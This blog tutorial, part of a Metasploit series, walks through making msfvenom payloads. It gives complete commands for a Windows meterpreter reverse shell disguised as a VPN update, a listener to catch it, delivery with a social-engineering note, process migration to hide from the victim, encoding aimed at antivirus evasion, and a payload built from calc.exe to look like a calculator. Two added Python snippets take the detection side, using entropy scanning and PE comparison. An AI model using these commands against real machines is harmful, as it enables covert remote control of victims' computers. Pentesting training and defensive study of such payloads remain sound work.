Generating Payloads using Msfvenom - Metasploit Part 5

Generating and encoding Payloads using Msfvenom


Well, apparently msfvenom is a separate tool from msfconsole that is used to generate payloads. That doesn't mean we cannot create payloads from within msfconsole, but the advantage of msfvenom is that we don't need to be inside msfconsole to generate them. No worries, we will be covering both methods :)

So let's hop onto it, shall we!

Command :

msfvenom --list

Fig : 1.1



In Fig : 1.1 we can see that the command prints brief instructions on how to use its different options

To list different types of modules we can use

Command :

msfvenom --list <module type>      e.g. msfvenom --list payloads

Fig : 1.2



In Fig : 1.2 we can see the different payloads available in msfvenom. Expect the command to take a while, as it has to load a large number of payloads

Let's create a meterpreter staged payload

Command :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -f exe -o vpnupdate.exe

-p : used to specify the payload

-f : defines the output format, which is exe in our case

LHOST : listening host

LPORT : listening port

-o : sets the output filename and location

Fig : 1.3


In Fig : 1.3 we can see the payload created. Also notice that msfvenom sets the platform to windows and the architecture to x86 when neither is specified explicitly. Another thing to note: Metasploit by default generates a 32-bit payload, which runs on both 32-bit and 64-bit systems, whereas a 64-bit payload only runs on a 64-bit system.

Payload behaviour :

Upon execution on the victim machine, the payload tries to connect back to the listening host and port given by the LHOST and LPORT options we specified

Note:

Don't forget the listening host and listening port, as we need them later when we use the multi/handler to catch the connection

We can also view all the options that can be customised for a given payload

Command :

msfvenom -p PayloadOfYourWish --list-options

Fig : 1.4


In Fig : 1.4 we can see the options available for the payload, which is windows/meterpreter/reverse_tcp

Now that the payload is generated, before sending it to the target machine let's set up the multi/handler in msfconsole to handle the connection we receive when the payload is executed on the victim's machine; we have to be listening for connections first

Commands :

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

Fig : 1.5


In Fig : 1.5 we set the payload to windows/meterpreter/reverse_tcp, as that is the connection we are going to receive from the victim machine when the payload executes

To view the options

Command :

show options

Fig : 1.6



In Fig : 1.6 we can see that we need to set the listening host and listening port 

Command :

set LHOST 192.168.233.235

set LPORT 9999

Note that the listening host and listening port must match the values used when creating the payload

Fig : 1.7


Let's run the multi-handler in the background

Command :

run -j

Now it's time to send it to the victim machine, which is Windows 7 in my case

Here I am transferring the file to the victim machine using a simple Python HTTP server, but in real-life scenarios the payload is sent through social engineering attacks

To start a simple Python HTTP server

Command :

python3 -m http.server

Fig : 1.8


In Fig : 1.8 we have started the simple Python HTTP server

Now let's connect and download the file on our Windows 7 machine

Fig : 1.9


Referring to Fig : 1.9, click Save File and save it at any location you wish

Now execute the file so that it connects back to our attacker machine

Fig : 2.0


In Fig : 2.0 we can see that the multi-handler has caught a connection and a session is opened

Commands :

sessions -i SessionNumber

getuid

Fig : 2.1


In Fig : 2.1 notice that our privilege level on the target machine is determined by the user who ran the payload: if a regular user runs it we get regular privileges, and if an administrator runs it we get administrator privileges

Tip 💡:

If you have noticed, our multi-handler job in the background ended upon catching a session. That feels like no problem, as it did its job of catching the session and we have nothing more to do with it, but in real-life pentesting we send our payloads to hundreds of machines, which obviously means we receive a lot of connections and want to catch 'em all. Happy to say that it is totally possible :) by setting an option before you hit run

set ExitOnSession false

You will not see this option when you execute the show options command or even show advanced, but it's there for anyone to use :)


So now let's list the processes and take a look

Fig : 2.2



Oh no, that's no good: if the victim lists the processes on their machine they will find our process running in the background. But we can get away from it, and that's what the command's name means as well! Funny me :)

Command :

migrate PID

Fig : 2.3



And now if you list the processes, your cheesy process will be nowhere to be found :)


Now that we understand how to create payloads with msfvenom and catch the connections, let's also see how to create payloads from within Metasploit

Command :

use payload

Until now we have been setting the payloads we want executed on the target machine upon exploitation; now it's time to use a payload module directly

Fig : 2.4


In Fig : 2.4 we can see, via the show options command, the options that are necessary to create the payload

Set LHOST and LPORT according to your machine settings

The option syntax for generating the payload is similar to what we did with msfvenom

Command :

generate -f exe -o linux_reverse_shell.exe

Fig : 2.5


In Fig : 2.5 we can see the generated payload; for further customization use the help generate command

Now that we know how to create payloads, it's time to encode them!

Encoding :

We encode our payload so that it avoids bad characters when we write it. Many people confuse this with an antivirus evasion technique, which isn't true: antivirus evasion is only a byproduct of encoding a payload. So remember that encoding a payload may happen to evade antivirus, but it is not guaranteed to, as that is not what it is meant for.

To list all the encoders 

Command :

show encoders

Fig : 2.6



In Fig : 2.6 we can see different available encoders

Now lets create a payload using an encoder

Command :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_machine_ip LPORT=port_number -e x86/shikata_ga_nai -f exe -o encoded_vpn_update.exe

-e : used to specify the encoder we want to use

Fig : 2.7


In Fig : 2.7 we can see the payload created using the x86/shikata_ga_nai encoder, a very popular encoder to use. We can also see iteration=0, which tells us the payload was encoded one time.
We can encode a payload multiple times as well.

Command : 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_machine_ip LPORT=port_number -e x86/shikata_ga_nai -i 7 -f exe -o encoded_vpn_update.exe

Fig : 2.8


That being said, don't assume that more iterations mean a better chance of bypassing the antivirus. It is possible that a payload encoded 3 times bypasses an antivirus system whereas a payload encoded 10 times gets caught by the same antivirus system. So I want you to stick this in your mind until your name's written in stone :)
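To see the point above from the detection side, here is an added Python example (not code from this blog or from Metasploit) showing the kind of entropy heuristic that scanners apply to files. An encoder pass, however many times it is repeated, leaves the payload as a dense, high-entropy blob, and that density is itself a signal; more iterations do not make it less visible. The sample image below is constructed inline (two low-entropy regions standing in for ordinary code and data, with a maximum-entropy 1 KiB region in the middle standing in for an encoded blob); it is not a real executable, and the window size and threshold are assumptions chosen for the demo.

```python
import math
from collections import Counter

WINDOW = 256       # bytes per window; small enough to localise a dense region
THRESHOLD = 7.0    # bits per byte; ordinary code and text rarely get this high


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for a perfectly uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = WINDOW, threshold: float = THRESHOLD) -> list:
    """Offsets of fixed-size, non-overlapping windows whose entropy exceeds the threshold."""
    return [off for off in range(0, len(data) - window + 1, window)
            if shannon_entropy(data[off:off + window]) > threshold]


def entropy_report(data: bytes, window: int = WINDOW, threshold: float = THRESHOLD) -> dict:
    """Summarise a file the way an entropy heuristic would: overall entropy,
    the offsets of windows that look packed or encoded, and the fraction flagged."""
    flagged = high_entropy_windows(data, window, threshold)
    total_windows = max(1, len(data) // window)
    return {
        "overall_entropy": round(shannon_entropy(data), 3),
        "flagged_offsets": flagged,
        "flagged_fraction": round(len(flagged) / total_windows, 3),
    }


# Constructed sample image (not a real executable). Each region is exactly 1024 bytes so
# the 256-byte windows line up with the region boundaries.
PLAIN_REGION = b"ordinary program text and data. " * 32   # 32 bytes * 32 = 1024, low entropy
DENSE_REGION = bytes(range(256)) * 4                        # every byte value equally often, 8 bits/byte
SAMPLE_IMAGE = PLAIN_REGION + DENSE_REGION + PLAIN_REGION

if __name__ == "__main__":
    report = entropy_report(SAMPLE_IMAGE)
    print(f"plain region entropy : {shannon_entropy(PLAIN_REGION):.2f} bits/byte")
    print(f"dense region entropy : {shannon_entropy(DENSE_REGION):.2f} bits/byte")
    print(f"windows above {THRESHOLD} bits/byte at offsets: {report['flagged_offsets']}")
    print(f"fraction of file flagged: {report['flagged_fraction']}")
```

To run this over a real file, replace SAMPLE_IMAGE with open(path, "rb").read(). The windows are non-overlapping so the offsets are easy to reason about; production scanners also weight the result by where the dense region sits (an executable section is more suspicious than a resource section).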

Hiding behind the Masquerade :

What if the victim downloads our payload and it looks like exactly what it claims to be? For instance, what if our payload looks like a calculator? I feel dope just hearing it, so let's get it done

First we need to download the calc.exe file from a Windows machine to use as a template when creating the payload, so that the result looks the same. We already know how to transfer files, so I'm going to skip that. The location of calc.exe on Windows is C:\Windows\system32\

Command :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.235 LPORT=9999 -f exe -x calc.exe -o calculator.exe

-x : uses the specified existing executable as a template when generating the payload

Fig : 2.9


Now let's download it onto the Windows 7 machine by running the Python HTTP server on our machine

Fig : 3.0


Fig : 3.1


In Fig : 3.1 we can see it looks exactly like a calculator, and the properties look right as well!

Fig : 3.2


In Fig : 3.2 we can see the session interaction !!

Note :

I have left the multi-handler setup to you this time; you've gotta pull it off. Don't let me down :)

You also have a -k or --keep option, which tries to preserve the functionality of the template executable. It isn't guaranteed to work, but I encourage you to try it.
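A matching icon and file properties are exactly what this section relies on, so the defender's lesson is that appearance is not identity. As an added example (not from this blog and not a Metasploit tool), the Python below compares a file that claims to be calc.exe against a known-good copy: it checks the SHA-256 hash, parses the PE section table, reports sections the reference does not have, and flags any section that is both writable and executable, which legitimate builds rarely need. It also reports the machine type, which is where the 32-bit versus 64-bit distinction from earlier in the post lives. It makes no claim about how msfvenom modifies a template; it simply reports whatever differs. The two PE images are constructed fixtures with an empty optional header (enough for the section parser, not loadable executables); the section names and flags in them are made up for the demo.

```python
import hashlib
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64"}


def parse_pe(pe: bytes) -> dict:
    """Read the COFF header and section table of a PE image:
    the machine type and a (name, characteristics) pair per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, num_sections, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + size_opt          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER is 40 bytes: Name first, Characteristics last
        name, *_, chars = struct.unpack_from("<8s6I2HI", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), chars))
    return {"machine": MACHINE_NAMES.get(machine, hex(machine)), "sections": sections}


def rwx_sections(pe: bytes) -> list:
    """Names of sections that are both writable and executable."""
    flags = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return [name for name, chars in parse_pe(pe)["sections"] if chars & flags == flags]


def compare_to_reference(candidate: bytes, reference: bytes) -> dict:
    """Compare a suspect file with a known-good copy: exact hash match,
    sections the reference lacks, and writable+executable sections."""
    cand, ref = parse_pe(candidate), parse_pe(reference)
    ref_names = {name for name, _ in ref["sections"]}
    return {
        "hash_match": hashlib.sha256(candidate).digest() == hashlib.sha256(reference).digest(),
        "machine": cand["machine"],
        "added_sections": [name for name, _ in cand["sections"] if name not in ref_names],
        "rwx_sections": rwx_sections(candidate),
    }


def build_minimal_pe(sections, machine=0x014C) -> bytes:
    """Constructed fixture: DOS stub, PE signature, COFF header and section table with
    SizeOfOptionalHeader = 0. Enough for parse_pe; it is not a loadable executable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)   # e_lfanew: PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(struct.pack("<8s6I2HI", name.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, chars)
                     for name, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + table


# Constructed samples: a "known-good" layout and a copy with one extra writable+executable section.
GENUINE = build_minimal_pe([(".text", 0x60000020), (".rdata", 0x40000040), (".data", 0xC0000040)])
SUSPECT = build_minimal_pe([(".text", 0x60000020), (".rdata", 0x40000040), (".data", 0xC0000040),
                            (".extra", 0xE0000020)])

if __name__ == "__main__":
    print(compare_to_reference(SUSPECT, GENUINE))
```

For real files, read both with open(path, "rb").read(); the parser honours whatever SizeOfOptionalHeader the file declares, so a genuine PE32 or PE32+ header is handled. A hash mismatch alone is enough to refuse a file that claims to be a system binary, and on Windows the publisher signature check (Get-AuthenticodeSignature) is the complementary test, since a copied icon and version resource do not carry a valid signature over the modified file.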


That's all for this blog, can't wait to see you again!

--------------------------------------------------------------------NOT THE END-----------------------------------------------------------------
